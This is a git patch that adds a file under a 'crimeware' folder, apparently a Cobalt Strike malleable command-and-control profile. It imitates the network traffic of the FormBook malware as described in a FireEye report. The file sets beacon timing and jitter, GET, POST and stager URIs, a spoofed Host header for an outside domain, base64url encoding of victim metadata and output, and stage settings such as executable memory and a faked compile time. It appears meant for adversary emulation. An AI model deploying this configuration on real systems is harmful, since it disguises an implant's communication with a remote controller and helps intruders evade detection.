From 5f556a4948650f8513c12b1f835be849c27a5d44 Mon Sep 17 00:00:00 2001 From: xx0hcd Date: Fri, 3 Nov 2017 16:34:59 -0500 Subject: [PATCH] Create formbook.profile --- crimeware/formbook.profile | 136 +++++++++++++++++++++++++++++++++++++ 1 file changed, 136 insertions(+) create mode 100644 crimeware/formbook.profile diff --git a/crimeware/formbook.profile b/crimeware/formbook.profile new file mode 100644 index 0000000..0aed7b0 --- /dev/null +++ b/crimeware/formbook.profile @@ -0,0 +1,136 @@ +#formbook malware +#taken from --> https://www.fireeye.com/blog/threat-research/2017/10/formbook-malware-distribution-campaigns.html +#xx0hcd + +set sleeptime "30000"; +set jitter "20"; +set useragent "Mozilla Firefox/4.0"; +set dns_idle "8.8.8.8"; +set maxdns "235"; + + +http-get { + + set uri "/list/hx28/config.php"; + + client { + + header "Host" "www.clicks-track.info"; + header "Connection" "close"; + + + metadata { + base64url; + parameter "id"; + + } + + + } + + server { + + header "Server" "Apache/2.4.18 (Ubuntu)"; + header "Connection" "close"; + header "Content-Type" "text/html; charset=utf-8"; + + + output { + + base64url; + + print; + } + } +} + +http-post { + + set uri "/List/hx28/config.php"; + + client { + + header "Host" "www.clicks-track.info"; + header "Connection" "close"; + #header "Cache-Control" "no-cache"; + header "Origin" "http://www.clicks-track.info"; + header "Content-Type" "application/x-www-form-urlencoded"; + header "Accept" "*/*"; + #header "Referer" "http://www.clicks-track.info/list/hx28/config.php"; + header "Accept-Language" "en-US"; + #header "Accept-Encoding" "gzip, deflate"; + + output { + base64url; + print; + + + + } + + + id { + base64url; + parameter "id"; + #header "Cookie"; + + } + + } + + server { + + header "Server" "Apache/2.4.18 (Ubuntu)"; + header "Connection" "close"; + header "Content-Type" "text/html; charset=utf-8"; + + + output { + base64url; + prepend "FBNG0x31"; + append "FBNG"; + print; + } + + } +} + +http-stager { + + set uri_x86 "/list/HX28/config.php"; + set uri_x64 "/list/hx28/Config.php"; + + + client { + + header "Host" "www.clicks-track.info"; + header "Connection" "close"; + + } + + server { + + header "Connection" "close"; + header "Cache-Control" "no-cache"; + header "Content-Type" "application/x-www-form-urlencoded"; + header "Accept" "*/*"; + header "Accept-Language" "en-US"; + header "Accept-Encoding" "gzip, deflate"; + + + output { + print; + } + + } + + +} + +stage { + set userwx "true"; + set compile_time "09 Jun 2012 13:19:49Z"; + set image_size_x86 "747652"; + set image_size_x64 "747652"; + #set obfuscate "true"; +}